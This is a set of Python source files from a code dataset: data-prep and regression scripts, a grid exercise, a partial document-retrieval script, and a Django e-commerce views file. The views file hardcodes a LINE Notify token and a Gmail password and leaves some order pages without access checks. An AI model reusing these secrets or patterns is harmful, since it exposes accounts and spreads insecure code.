outputs.\r\nblog=1\r\ncols=['blog','text']\r\ndfout=pd.DataFrame(columns=cols)\r\nfor i,file in enumerate(trainfiles):\r\n blog=int(blog)\r\n textobj=open(pathtrain+trainfiles[i],'r')\r\n text=textobj.read()\r\n text=rmCRLF(text)\r\n# print(i,'\\n',text)\r\n# Create temp dataframe for appending.\r\n dfnew=pd.DataFrame([[int(blog),text]],columns=cols)\r\n dfout=dfout.append(dfnew)\r\n blog=blog+1\r\n# if i > 9:\r\n# break\r\n# Now add test files.\r\ntestfiles=listdir(pathtest)\r\nfor i,file in enumerate(testfiles):\r\n blog=int(blog)\r\n textobj=open(pathtest+testfiles[i],'r')\r\n text=textobj.read()\r\n text=rmCRLF(text)\r\n# print(i,'\\n',text)\r\n# Create temp dataframe for appending.\r\n dfnew=pd.DataFrame([[int(blog),text]],columns=cols)\r\n dfout=dfout.append(dfnew)\r\n blog=blog+1\r\ndfout['blog']=dfout['blog'].astype(int)\r\ndfout.to_csv(path_or_buf=outpath+outfile, index=False)\r\n","sub_path":"TextMine_UFOFormat_csv.py","file_name":"TextMine_UFOFormat_csv.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"332586912","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 15 00:58:16 2018\n\n@author: codyyork\n\"\"\"\n\n###Multple Linear Regression###\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n\ndataset = pd.read_csv(\n \"/Users/codyyork/Documents/GitHub/Machine_Learning/Regression/Multiple Linear Regression/50_Startups.csv\")\nx = dataset.iloc[:, :-1].values\ny = dataset.iloc[:, 4].values\n\nfrom sklearn.preprocessing import LabelEncoder,OneHotEncoder \nLabelEncoder_x = LabelEncoder()\nx[:, 3] = LabelEncoder_x.fit_transform(x[:, 3])\n \noneHotEncoder = OneHotEncoder(categorical_features = [3])\nx = oneHotEncoder.fit_transform(x).toarray()\n\n##Avoiding the Dummy Variable Trap##\nx = x[:, 1:]\n\nfrom sklearn.model_selection import train_test_split\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size = 0.2)\n\n##Fitting Multiple Linear Regression to the Training set##\nfrom sklearn.linear_model import LinearRegression\nregressor = LinearRegression()\nregressor.fit(x_train, y_train)\n\n##Predicting the Test set results##\ny_pred = regressor.predict(x_test)\n\n##Building the optimal model using Backward Elimination##\nimport statsmodels.formula.api as sm\n\n#only p-values\ndef backwardElimination(x, sl):\n numVars = len(x[0])\n for i in range(0, numVars):\n regressor_OLS = sm.OLS(y, x).fit()\n maxVar = max(regressor_OLS.pvalues).astype(float)\n if maxVar > sl:\n for j in range(0, numVars - i):\n if (regressor_OLS.pvalues[j].astype(float) == maxVar):\n x = np.delete(x, j, 1)\n regressor_OLS.summary()\n return x\n \nSL = 0.05\nx_opt = x[:, [0, 1, 2, 3, 4, 5]]\nx_modeled = backwardElimination(x_opt, SL)\n\n#p-values and r sqaured\n'''\ndef backwardElimination(x, SL):\n numVars = len(x[0])\n temp = np.zeros((50,6)).astype(int)\n for i in range(0, numVars):\n regressor_OLS = sm.OLS(y, x).fit()\n maxVar = max(regressor_OLS.pvalues).astype(float)\n adjR_before = regressor_OLS.rsquared_adj.astype(float)\n if maxVar > SL:\n for j in range(0, numVars - i):\n if (regressor_OLS.pvalues[j].astype(float) == maxVar):\n temp[:,j] = x[:, j]\n x = np.delete(x, j, 1)\n tmp_regressor = sm.OLS(y, x).fit()\n adjR_after = tmp_regressor.rsquared_adj.astype(float)\n if (adjR_before >= adjR_after):\n x_rollback = np.hstack((x, temp[:,[0,j]]))\n x_rollback = np.delete(x_rollback, j, 1)\n print (regressor_OLS.summary())\n return x_rollback\n else:\n continue\n regressor_OLS.summary()\n return x\n \nSL = 0.05\nx_opt = x[:, [0, 1, 2, 3, 4, 5]]\nx_modeled = backwardElimination(x_opt, SL)\n'''\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Regression/Multiple Linear Regression/Multiple_Linear_Regression.py","file_name":"Multiple_Linear_Regression.py","file_ext":"py","file_size_in_byte":2854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"223932244","text":"from django.contrib import admin\nfrom django.core import paginator\nfrom django.core.paginator import Paginator\nfrom django.db import reset_queries\nfrom django.http import request\nfrom django.shortcuts import render, redirect #restricly access\nfrom django.http import HttpResponse #HttpResponse is a fucntion to show content on site\nfrom .models import *\nfrom datetime import datetime\n\n########Line Notify########\nfrom songline import Sendline\ntoken ='ZDXWM1wd3IhrbZjeq882GXgIBk8OnRk8qFDklLPXn7c'\nmessenger = Sendline(token)\n\n######Generate token#########\nimport random\nimport string\ndef GenerateToken(domain='http://localhost:8000/confirm/'):\n\tallchar = [ i for i in list(string.ascii_letters)] #Generate ascii to list\n\tallchar.extend([str(i) for i in range(10)])# extending number 0-9 in the list\n\temailtoken = ''\n\tfor i in range(40):\n\t\temailtoken += random.choice(allchar)\n\n\turl = domain + emailtoken\n\t#print(url)\n\treturn (url,emailtoken)\n\ndef Confirm(request,token):\n\ttry:\n\t\tcheck = VerifyEmail.objects.get(token=token)\n\t\tstatus = 'found'\n\t\tcheck.approved = True\n\t\tcheck.save()\n\t\tcontext = {'status':status,'username':check.user.username,'name':check.user.first_name}\n\texcept:\n\t\tstatus = 'notfound'\n\t\tcontext = {'status':status}\n\t\n\treturn render(request, 'myapp/confirm.html',context)\n\n#######EMAIL########\nimport smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\n\ndef sendthai(sendto,subj=\"ทดสอบส่งเมลลล์\",detail=\"สวัสดี!\\nคุณสบายดีไหม?\\n\"):\n\n\tmyemail = 'noreply.teamtesting@gmail.com'\n\tmypassword = \"gsHofh;p96\"\n\treceiver = sendto\n\n\tmsg = MIMEMultipart('alternative')\n\tmsg['Subject'] = subj\n\tmsg['From'] = 'Team Best Fruit'\n\tmsg['To'] = receiver\n\ttext = detail\n\n\tpart1 = MIMEText(text, 'plain')\n\tmsg.attach(part1)\n\n\ts = smtplib.SMTP('smtp.gmail.com:587')\n\ts.ehlo()\n\ts.starttls()\n\n\ts.login(myemail, mypassword)\n\ts.sendmail(myemail, receiver.split(','), msg.as_string())\n\ts.quit()\n\n\n###########Start sending#############\ndef EmailConfirm(email,name,token):\n\tsubject = 'ยืนยันการสมัครเว็บไซต์ Best Fruit'\n\tnewmember_name = name\n\tcontent = '''\n\tขอบคุณที่ท่านทำการสัมครสามาชิก Best Fruit! ปลอดภัยของการเข้าใช้\n\tกรุณายืนยันอีเมลล์ ผ่านลิ้งค์ด้านล่างนี้:\n\tขอให้สนุกกับการเลือกสินค้า และถ้าต้องการติดต่อ เสนอแนะเราท่านสามารถติต่อเราได้ทันที.\n\t'''\n\n\t#link = 'http://best-fruit.com/confirm/fawtkataktaktkawkejtjka'\n\tlink = token\n\n\tmsg = 'สวัสดีครับ คุณ{} \\n\\n {}\\n Verify Link: {}'.format(newmember_name,content,link)\n\tsendthai(email,subject,msg)\n###############\n\n\n# Create your views here.\ndef Home(request):\n\tproduct = Allproduct.objects.all().order_by('id').reverse()[:3] #query data form all products by descending order\n\tpreorder = Allproduct.objects.filter(quantity__lte=0 ) \n\t#quantity__lte=0 (find the quantity is less than or equal zero (<=0))\n\t#quantity__gt=0 (find the quantity is greater than zero (>))\n\tcontext = {'product':product,'preorder':preorder}\n\treturn render(request, 'myapp/home.html', context)\n\n\n\t#return HttpResponse('

      สวัสดี Hello world

      ')\n\ndef About(request):\n\treturn render(request, 'myapp/about.html')\n\ndef Contact(request):\n\treturn render(request, 'myapp/contact.html')\n\ndef Apple(request):\n\treturn render(request, 'myapp/apple.html')\n\nfrom django.core.files.storage import FileSystemStorage\n\ndef Addproduct(request):\n\n\tif request.user.profile.usertype != 'admin':\n\t\treturn redirect('home-page')\n\n\n\tif request.method == 'POST':\n\t\tdata = request.POST.copy()\n\t\tname = data.get('name')\n\t\tprice = data.get('price')\n\t\tdetail = data.get('detail')\n\t\timageurl = data.get('imageurl')\n\t\tquantity = data.get('quantity')\n\t\tunit = data.get('unit')\n\n\n\t\tnew = Allproduct()\n\t\tnew.name = name\n\t\tnew.price = price\n\t\tnew.detail = detail\n\t\tnew.imageurl = imageurl\n\t\tnew.quantity = quantity\n\t\tnew.unit = unit\n\t\t############Save Image################\n\t\ttry:\n\t\t\tfile_image = request.FILES['imageupload']\n\t\t\tfile_image_name = request.FILES['imageupload'].name.replace(' ','')\n\t\t\tprint('FILE_IMAGE:', file_image)\n\t\t\tprint('IMAGE_NAME:', file_image_name)\n\t\t\tfs = FileSystemStorage()\n\t\t\tfilename = fs.save(file_image_name,file_image)\n\t\t\tupload_file_url = fs.url(filename)\n\t\t\tnew.image = upload_file_url[6:]\n\t\texcept:\n\t\t\tnew.image = '/default-product.jpg'\n\t\t###############################\n\t\tnew.save()\n\n\treturn render(request, 'myapp/addproduct.html')\n\nfrom django.core.paginator import Paginator\n\ndef Products(request):\n\tproduct = Allproduct.objects.all().order_by('id').reverse() #query data from all products by descending order\n\tpaginator = Paginator(product,3) #1 หน้าโชว์ 3 ชิ้นเท่านั้น\n\tpage = request.GET.get('page') # http://localhost:8000/allproduct/?page=2\n\tproduct = paginator.get_page(page)\n\tcontext = {'product':product}\n\treturn render(request, 'myapp/allproduct.html', context)\n\ndef ProductsCategory(request,code):\n\tselect = Category.objects.get(id=code)\n\tproduct = Allproduct.objects.filter(catname=select).order_by('id').reverse() #query data from all products by descending order\n\tpaginator = Paginator(product,3) #1 หน้าโชว์ 3 ชิ้นเท่านั้น\n\tpage = request.GET.get('page') # http://localhost:8000/allproduct/?page=2\n\tproduct = paginator.get_page(page)\n\tcontext = {'product':product,'catname':select.catname}\n\treturn render(request, 'myapp/allproductcat.html', context)\n\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import authenticate, login\n\ndef Register(request):\n\tif request.method == 'POST':\n\t\tdata = request.POST.copy()\n\t\tfirst_name = data.get('first_name')\n\t\tlast_name = data.get('last_name')\n\t\temail = data.get('email')\n\t\tpassword = data.get('password')\n\t\t#ยังไม่ได้ใส่ try except เพื่อป้องกันการสมัครซ้ำ\n\t\t#+ alret ไปหน้าสมัครว่าอีเมลล์นี้เคยสมัครแล้ว\n\t\t#สอนคู่กับหัวข้อ reset password\n\n\t\tnewuser = User()\n\t\tnewuser.username = email\n\t\tnewuser.email = email\n\t\tnewuser.first_name = first_name\n\t\tnewuser.last_name = last_name\n\t\tnewuser.set_password(password)\n\t\tnewuser.save()\n\n\t\tprofile = Profile()\n\t\tprofile.user = User.objects.get(username=email)\n\t\tprofile.save()\n\n\t\t##### send email for verify #### **** <<>>\n\t\ttoken,token_code = GenerateToken()\n\t\tEmailConfirm(email,first_name,token)\n\t\tgetuser = User.objects.get(username=email)\n\t\taddverify = VerifyEmail()\n\t\taddverify.user = getuser\n\t\taddverify.token = token_code\n\t\taddverify.save()\n\n\t\t#from django.contrib.auth import authenticate, login\n\t\tuser = authenticate(username=email, password=password)\n\t\tlogin(request,user) \n\t\t#Auto login\n\n\treturn render(request, 'myapp/register.html')\n\n\ndef AddtoCart(request,pid):\n\t# localhost:8000/addtocart/pid\n\t# or {% url 'addtocart-page' pd.id %}\n\tprint('CURRENT USER:',request.user)\n\tusername = request.user.username\n\tuser = User.objects.get(username=username)\n\tcheck = Allproduct.objects.get(id=pid)\n\ttry:\n\t\t#กรณีที่สินค้ามีซ้ำ\n\t\tnewcart = Cart.objects.get(user=user,productid=str(pid))\n\t\t#print('EXISTS: ', pcheck.exists())\n\t\tnewquan = newcart.quantity + 1\n\t\tnewcart.quantity = newquan\n\t\tcalculate = newcart.price * newquan\n\t\tnewcart.total = calculate\n\t\tnewcart.save()\n\n\t\t#update items amount in cart\n\t\tcount = Cart.objects.filter(user=user)\n\t\tcount = sum([ c.quantity for c in count])\n\t\tupdatequan = Profile.objects.get(user=user)\n\t\tupdatequan.cartquan = count\n\t\tupdatequan.save()\n\n\t\treturn redirect('allproduct-page')\n\n\texcept:\n\t\tnewcart = Cart()\n\t\tnewcart.user = user\n\t\tnewcart.productid = pid\n\t\tnewcart.productname = check.name\n\t\tnewcart.price = int(check.price)\n\t\tnewcart.quantity = 1\n\t\tcalculate = int(check.price) * 1\n\t\tnewcart.total = calculate\n\t\tnewcart.save()\n\n\t\tcount = Cart.objects.filter(user=user)\n\t\tcount = sum([ c.quantity for c in count])\n\t\tupdatequan = Profile.objects.get(user=user)\n\t\tupdatequan.cartquan = count\n\t\tupdatequan.save()\n\n\t\treturn redirect('allproduct-page')\n\n\ndef MyCart(request):\n\tusername = request.user.username\n\tuser = User.objects.get(username=username)\n\tcontext = {}\n\tif request.method == 'POST':\n\t\t#ใช้สำหรับการลบเท่านั้น\n\t\tdata =request.POST.copy()\n\t\tproductid = data.get('productid')\n\t\tprint('PID',productid)\n\t\titem = Cart.objects.get(user=user,productid=productid)\n\t\titem.delete()\n\t\tcontext['status'] = 'delete'\n\n\t\tcount = Cart.objects.filter(user=user)\n\t\tcount = sum([ c.quantity for c in count])\n\t\tupdatequan = Profile.objects.get(user=user)\n\t\tupdatequan.cartquan = count\n\t\tupdatequan.save()\n\n\tmycart = Cart.objects.filter(user=user)\n\tcount = sum([ c.quantity for c in mycart])\n\ttotal = sum([ c.total for c in mycart])\n\n\tcontext['mycart'] = mycart\n\tcontext['count'] = count\n\tcontext['total'] = total\n\n\n\treturn render(request, 'myapp/mycart.html',context)\n\ndef MyCartEdit(request):\n\tusername = request.user.username\n\tuser = User.objects.get(username=username)\n\tcontext = {}\n\tif request.method == 'POST':\n\t\tdata = request.POST.copy()\n\t\t#print(data)\n\t\tif data.get('clear') == 'clear':\n\t\t\tprint(data.get('clear'))\n\t\t\tCart.objects.filter(user=user).delete()\n\t\t\tupdatequan = Profile.objects.get(user=user)\n\t\t\tupdatequan.cartquan = 0\n\t\t\tupdatequan.save()\n\t\t\treturn redirect('mycart-page')\n\t\t\n\t\teditlist = []\n\t\tfor k,v in data.items(): \n\t\t\t#print([k,v])\n\t\t\tif k[:2] == 'pd':\n\t\t\t\tpid = int(k.split('_')[1])\n\t\t\t\tdt = [pid,int(v)]\n\t\t\t\teditlist.append(dt)\n\t\t#print('EDITLIST:', editlist) #[[productID,quan]]\n\n\t\tfor ed in editlist:\n\t\t\tedit = Cart.objects.get(productid=ed[0],user=user)#productid\n\t\t\tedit.quantity = ed[1] #quantity\n\t\t\tcalculate = edit.price * ed[1]\n\t\t\tedit.total = calculate\n\t\t\tedit.save()\n\n\n\t\tcount = Cart.objects.filter(user=user)\n\t\tcount = sum([ c.quantity for c in count])\n\t\tupdatequan = Profile.objects.get(user=user)\n\t\tupdatequan.cartquan = count\n\t\tupdatequan.save()\n\t\treturn redirect('mycart-page')\n\t\t\n\n\tmycart = Cart.objects.filter(user=user)\n\tcontext['mycart'] = mycart\n\n\n\treturn render(request, 'myapp/mycartedit.html',context)\n\ndef Checkout(request):\n\tusername = request.user.username\n\tuser = User.objects.get(username=username)\n\tif request.method == 'POST':\n\t\tdata = request.POST.copy()\n\t\tname = data.get('name')\n\t\ttel = data.get('tel')\n\t\taddress = data.get('address')\n\t\tshipping = data.get('shipping')\n\t\tpayment = data.get('payment')\n\t\tother = data.get('other')\n\t\tpage = data.get('page')\n\t\tif page == 'information':\n\t\t\tcontext = {}\n\t\t\tcontext['name'] = name\n\t\t\tcontext['tel'] = tel\n\t\t\tcontext['address'] = address\n\t\t\tcontext['shipping'] = shipping\n\t\t\tcontext['payment'] = payment\n\t\t\tcontext['other'] = other\n\n\t\t\tmycart = Cart.objects.filter(user=user)\n\t\t\tcount = sum([ c.quantity for c in mycart])\n\t\t\ttotal = sum([ c.total for c in mycart])\n\n\t\t\tcontext['mycart'] = mycart\n\t\t\tcontext['count'] = count\n\t\t\tcontext['total'] = total\n\n\t\t\treturn render(request, 'myapp/checkout2.html', context)\n\n\t\tif page == 'confirm':\n\t\t\tprint('Confirm')\n\t\t\tprint(data)\n\t\t\tmycart = Cart.objects.filter(user=user)\n\t\t\t# generate order no. and save to Order Models\n\t\t\t# id = OD 0007 2020 09 03 22 00 30\n\t\t\t# id = OD 0230 20200903220030\n\t\t\tmid = str(user.id).zfill(4)\n\t\t\tdt = datetime.now().strftime('%Y%m%d%H%M%S')\n\t\t\torderid = 'OD'+ mid + dt\n\t\t\tproductorder = ''\n\t\t\tproducttotal = 0\n\n\t\t\tfor pd in mycart: \n\t\t\t\torder = OrderList()\n\t\t\t\torder.orderid = orderid\n\t\t\t\torder.productid = pd.productid\n\t\t\t\torder.productname = pd.productname\n\t\t\t\torder.price = pd.price\n\t\t\t\torder.quantity = pd.quantity\n\t\t\t\torder.total = pd.total\n\t\t\t\torder.save()\n\t\t\t\tproductorder = productorder + '- {}\\n'.format(pd.productname)#รายการสินค้า\n\t\t\t\tproducttotal += pd.total\n\n\t\t\t\n\t\t\t# Send to LINE Notify in Group\n\t\t\ttexttoline = 'ODID: {}\\n---\\n{}ยอดรวม: {:,.2f} บาท\\n ({})'.format(orderid,productorder,producttotal,name)\n\t\t\t# เช็คยอดสินค้าว่ามากกว่า 10000 หรือไม่หากจริงจะส่งสติกเกอร์ไปด้วย\n\t\t\tif producttotal > 10000:\n\t\t\t\tmessenger.sticker(14,1,texttoline)\n\t\t\telse:\n\t\t\t\tmessenger.sendtext(texttoline)\n\n\n\t\t\t# save product in cart to OrderProduct models\n\t\t\t# creat order pending\n\t\t\todp = OrderPending()\n\t\t\todp.orderid = orderid\n\t\t\todp.user = user\n\t\t\todp.name = name\n\t\t\todp.tel = tel\n\t\t\todp.address = address\n\t\t\todp.shipping = shipping\n\t\t\todp.payment = payment\n\t\t\todp.other = other\n\t\t\todp.save()\n\n\t\t\t# clear cart\n\t\t\tCart.objects.filter(user=user).delete()\n\t\t\tupdatequan = Profile.objects.get(user=user)\n\t\t\tupdatequan.cartquan = 0\n\t\t\tupdatequan.save()\n\t\t\treturn redirect('mycart-page')\n\n\treturn render(request, 'myapp/checkout1.html')\n\n# redirect to order list page\ndef OrderListPage(request):\n\tusername = request.user.username\n\tuser = User.objects.get(username=username)\n\tcontext = {}\n\torder = OrderPending.objects.filter(user=user)\n\t'''\n\t-order\n\t\t-order id: OD000220201202131342\n\t\t-user:\n\t\t-name: ผู้รับ\n\t'''\n\tfor od in order:\n\t\torderid = od.orderid\n\t\todlist = OrderList.objects.filter(orderid=orderid)\n\t\t'''\n\t\t\t-odlist\n\t\t\t-object (1)\n\t\t\t\t-orderid: OD1033134\n\t\t\t\t-product: ทุเรียน\n\t\t\t\t-total: 500\n\t\t\t-object (2)\n\t\t\t\t-orderid: OD1033134\n\t\t\t\t-product: กล้วย\n\t\t\t\t-total: 300\n\t\t\t-object (3)\n\t\t\t\t-orderid: OD1033134\n\t\t\t\t-product: ส้ม\n\t\t\t\t-total: 200\n\n\t\t'''\n\t\t# total = summation from orderlist sum([500,300,200])\n\t\ttotal = sum([c.total for c in odlist])\n\t\tod.total = total\n\t\t# สั่งนับ order ทั้งหมดมีจำนวนกี่ชิ้น\n\t\tcount = sum([c.quantity for c in odlist])\n\n\t\tif od.shipping == 'ems':\n\t\t\tshipcost = sum([50 if i == 0 else 10 for i in range(count)])\n\t\t\t# shipcost = รวมค่าทั้งหมด (หากเป็นชิ้นแรกค่าส่งจะคิด 50 บาท ชิ้นถัดไปชิ้นละ 10 บาท)\n\t\telse:\n\t\t\tshipcost = sum([35 if i == 0 else 10 for i in range(count)])\n\n\t\tif od.payment == 'cod':\n\t\t\tshipcost += 20 # shipcost = shipcost + 20 for 'COD'\n\t\tod.shipcost = shipcost\n\n\t\n\tcontext['allorder'] = order\n\n\treturn render(request, 'myapp/orderlist.html',context)\n\ndef AllOrderListPage(request):\n\t\n\tcontext = {}\n\torder = OrderPending.objects.all()\n\n\n\tfor od in order:\n\t\torderid = od.orderid\n\t\todlist = OrderList.objects.filter(orderid=orderid)\n\t\ttotal = sum([ c.total for c in odlist])\n\t\tod.total = total\n\n\t\tcount = sum([ c.quantity for c in odlist])\n\n\t\tif od.shipping == 'ems':\n\t\t\tshipcost = sum([ 50 if i == 0 else 10 for i in range(count)])\n\t\t\t# shipcost = รวมค่าทั้งหมด (หากเป็นชิ้นแรกค่าส่งจะคิด 50 บาท ชิ้นถัดไปชิ้นละ 10 บาท)\n\t\telse:\n\t\t\tshipcost = sum([ 35 if i == 0 else 10 for i in range(count)])\n\n\t\tif od.payment == 'cod':\n\t\t\tshipcost += 20 # shipcost = shipcost + 20\n\t\tod.shipcost = shipcost\n\n\tpaginator = Paginator(order,5)\n\tpage = request.GET.get('page') # http://localhost:8000/allorderlist/?page=\n\torder = paginator.get_page(page)\n\tcontext['allorder'] = order\n\t\n\treturn render(request, 'myapp/allorderlist.html',context)\n\ndef UploadSlip(request,orderid):\n\tprint('order ID:',orderid)\n\n\tif request.method == 'POST' and request.FILES['slip']:\n\t\tdata = request.POST.copy()\n\t\tsliptime = data.get('sliptime')\n\n\t\tupdate = OrderPending.objects.get(orderid=orderid)\n\t\tupdate.sliptime = sliptime\n\t\t##########Save ImageSlip#########\n\t\tfile_image = request.FILES['slip']\n\t\tfile_image_name = request.FILES['slip'].name.replace(' ','')\n\t\tprint('FILE_IMAGE:',file_image)\n\t\tprint('IMAGE_NAME:',file_image_name)\n\t\tfs = FileSystemStorage()\n\t\tfilename = fs.save(file_image_name,file_image)\n\t\tupload_file_url = fs.url(filename)\n\t\tupdate.slip = upload_file_url[6:]\n\t\t#################################\n\t\tupdate.save()\n\n\n\todlist = OrderList.objects.filter(orderid=orderid)\n\ttotal = sum([c.total for c in odlist])\n\toddetail = OrderPending.objects.get(orderid=orderid)\n\t# สั่งนับ order ทั้งหมดมีจำนวนกี่ชิ้น\n\tcount = sum([c.quantity for c in odlist])\n\n\tif oddetail.shipping == 'ems':\n\t\tshipcost = sum([50 if i == 0 else 10 for i in range(count)])\n\t\t# shipcost = รวมค่าทั้งหมด (หากเป็นชิ้นแรกค่าส่งจะคิด 50 บาท ชิ้นถัดไปชิ้นละ 10 บาท)\n\telse:\n\t\tshipcost = sum([35 if i == 0 else 10 for i in range(count)])\n\n\tif oddetail.payment == 'cod':\n\t\tshipcost += 20 # shipcost = shipcost + 20 for 'COD'\n\t\n\tcontext= {'orderid':orderid,\n\t\t\t 'total':total,\n\t\t\t 'shipcost':shipcost,\n\t\t\t 'grandtotal':total+shipcost,\n\t\t\t 'oddetail':oddetail,\n\t\t\t 'count':count}\n\t\n\treturn render(request, 'myapp/uploadslip.html',context)\n\ndef UpdatePaid(request,orderid,status):\n\t\t\n\tif request.user.profile.usertype != 'admin':\n\t\treturn redirect('home-page')\n\t\n\torder = OrderPending.objects.get(orderid=orderid)\n\tif status == 'confirm':\n\t\torder.paid = True\n\telif status == 'cancel':\n\t\torder.paid = False\n\torder.save()\n\treturn redirect('allorderlist-page')\n\ndef UpdateTracking(request,orderid):\n\tif request.user.profile.usertype != 'admin':\n\t\treturn redirect('home-page')\n\t\t\n\tif request.method == 'POST':\n\t\torder = OrderPending.objects.get(orderid=orderid)\n\t\tdata = request.POST.copy()\n\t\ttrackingnumber = data.get('trackingnumber')\n\t\torder.trackingnumber = trackingnumber\n\t\torder.save()\n\t\treturn redirect('allorderlist-page')\n\t\t\n\torder = OrderPending.objects.get(orderid=orderid)\n\todlist = OrderList.objects.filter(orderid=orderid)\n\t#### shipcost calculate\n\ttotal = sum([ c.total for c in odlist])\n\torder.total = total\n\n\tcount = sum([ c.quantity for c in odlist])\n\n\tif order.shipping == 'ems':\n\t\tshipcost = sum([ 50 if i == 0 else 10 for i in range(count)])\n\t\t# shipcost = รวมค่าทั้งหมด (หากเป็นชิ้นแรกค่าส่งจะคิด 50 บาท ชิ้นถัดไปชิ้นละ 10 บาท)\n\telse:\n\t\tshipcost = sum([ 35 if i == 0 else 10 for i in range(count)])\n\n\tif order.payment == 'cod':\n\t\tshipcost += 20 # shipcost = shipcost + 20\n\torder.shipcost = shipcost\n\n\tcontext = {'orderid':orderid,'order':order,'odlist':odlist,'total':total,'count':count}\n\n\treturn render(request, 'myapp/updatetracking.html', context)\n\ndef MyOrder (request,orderid):\n\tusername = request.user.username\n\tuser = User.objects.get(username=username)\n\n\torder = OrderPending.objects.get(orderid=orderid)\n\t#เช็คว่าเป็นของตัวเองไหม?\n\tif user != order.user:\n\t\treturn redirect('allproduct-page')\n\n\todlist = OrderList.objects.filter(orderid=orderid)\n\t#### shipcost calculate\n\ttotal = sum([ c.total for c in odlist])\n\torder.total = total\n\n\tcount = sum([ c.quantity for c in odlist])\n\n\tif order.shipping == 'ems':\n\t\tshipcost = sum([ 50 if i == 0 else 10 for i in range(count)])\n\t\t# shipcost = รวมค่าทั้งหมด (หากเป็นชิ้นแรกค่าส่งจะคิด 50 บาท ชิ้นถัดไปชิ้นละ 10 บาท)\n\telse:\n\t\tshipcost = sum([ 35 if i == 0 else 10 for i in range(count)])\n\n\tif order.payment == 'cod':\n\t\tshipcost += 20 # shipcost = shipcost + 20\n\torder.shipcost = shipcost\n\n\tcontext = {'order':order,'odlist':odlist,'total':total,'count':count}\n\n\treturn render(request, 'myapp/myorder.html', context)","sub_path":"myapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":19855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"450431883","text":"# grid_part_final.py\n#\n# This is the assignment for Lesson2, each part of the exercise is included.\n# As indicated in the exercise, \"Do something reasonable\", I attempted to meet\n# the objectives of the exercise utilizing the demonstrated elements for\n# string manipulation that were provided. The end result is a grid that is\n# printed out with modular functions to aid in the printing & gathering of\n# user input. I allowed for the user to indicate the cell size, to indicate\n# the number of columns in the grid, and to also indicate the number of rows.\n#\n# This code isplays a grid of small boxes based on user input for square size & dimensions.\n# Where the user enters a value for x and y, the grid of boxes is x by y in grid size.\n#\n# Coded by LouReis\n#\n# A one by one box looks like the following\n# +-+\n# | |\n# +-+\n\nplus='+'\nminus='-'\nspace=' '\nbar='|'\n\ndef variable_square_row(size,columns):\n#This function prints out a row of variable sized squares.\n var_top=plus+(size*minus)+plus+space\n var_mid=bar+(size*space)+bar+space\n for x in range(0,columns):\n print(var_top, end=\"\")\n print()\n for x in range (0,size):\n for x in range (0,columns):\n print(var_mid,end=\"\")\n print()\n for x in range (0,columns):\n print(var_top, end=\"\")\n print()\n\ndef variable_size_grid(size,columns,rows):\n#This function is to draw out the grid based on size, columns, & rows.\n for x in range (0,rows):\n variable_square_row(size,columns)\n\ndef user_input():\n#This function prompts the user for the square size & grid dimensions.\n print ('This program prints out a grid of squares.')\n size=int(input('Enter the number for square size: '))\n columns=int(input('Enter the number of columns: '))\n rows=int(input('Enter the number of rows: '))\n print('Here is a',columns,'by',rows,'grid:')\n variable_size_grid(size,columns,rows)\n\n#Call the function to prompt the user for the 3 parameters.\nuser_input()\n","sub_path":"students/LouReis/Lesson02/grid_part_final.py","file_name":"grid_part_final.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"355254388","text":"#!/usr/bin/python\nimport gc\nimport logging\nimport multiprocessing\nimport os\nimport subprocess\nimport time\nfrom pathlib import Path\n\nimport requests\nimport re\n\nimport torch\nfrom typing import List\n\nimport wandb\nfrom simpletransformers.classification import ClassificationModel, ClassificationArgs\nimport pandas\nimport xml.etree.ElementTree as ET\n\nfrom auth.auth import Auth\n\nlogging.basicConfig(level=logging.INFO)\ntransformers_logger = logging.getLogger(\"transformers\")\ntransformers_logger.setLevel(logging.WARNING)\n\n\ndef accuracy_score(true_in, pred_in):\n accuracy = 0\n size = len(true_in)\n\n if size == 1:\n true_in = [true_in]\n pred_in = [pred_in]\n\n for true, pred in zip(true_in, pred_in):\n\n if true == 0:\n if pred == 0:\n accuracy = +1\n elif pred == 1:\n accuracy = +0.1\n\n elif true == 1:\n if pred == 1:\n accuracy = +1\n elif pred == 2:\n accuracy = +0.8\n else:\n accuracy = +0.1\n\n else: # true == 2\n if pred == 1:\n accuracy = +0.8\n elif pred == 2:\n accuracy = +1\n\n if accuracy == 0:\n return accuracy\n\n return accuracy / size\n\n\ndef get_titles(file):\n tree = ET.parse(file)\n root = tree.getroot()\n buffer = []\n\n for title in root.iter(\"title\"):\n buffer.append(title.text.strip())\n return buffer\n\n\ndef retrievingFullDocuments(uuid, index):\n url = \"https://www.chatnoir.eu/cache\"\n\n request_data = {\"uuid\": uuid, \"index\": index, \"raw\": \"raw\", \"plain\": \"plain\"}\n\n data = requests.get(url, request_data).text\n data = re.sub(\"<[^>]+>\", \"\", data)\n data = re.sub(\"\\n\", \"\", data)\n data = re.sub(\"&[^;]+;\", \"\", data)\n\n return data\n\n\ndef uuidToText(data: pandas.DataFrame):\n if Path(\"res/UUID-Text.csv\").is_file():\n print(\"[INFO] UUID-Text.csv found. Loading...\")\n Documents = pandas.read_csv(\n \"res/UUID-Text.csv\", names=[\"uuid\", \"trec_id\", \"FullText\"]\n )\n else:\n print(\n \"[INFO] UUID-Text.csv not found at './res/touche20-task2-docs-ID-UUID'. Creating ...\"\n )\n fullText = []\n\n print(\"[INFO] Retrieving Documents\")\n size = data.shape[0]\n\n for index, row in data.iterrows():\n uuid = row[\"uuid\"]\n trec_id = row[\"trec_id\"]\n\n for x in range(10): #\n try:\n buffer = uuid, trec_id, retrievingFullDocuments(uuid, \"cw12\")\n fullText.append(buffer)\n str_error = None\n except Exception as str_error:\n pass\n\n if str_error:\n time.sleep(10)\n if x == 9:\n print(\"[ERROR] Cannot retrieve Documents. Exiting ...\")\n 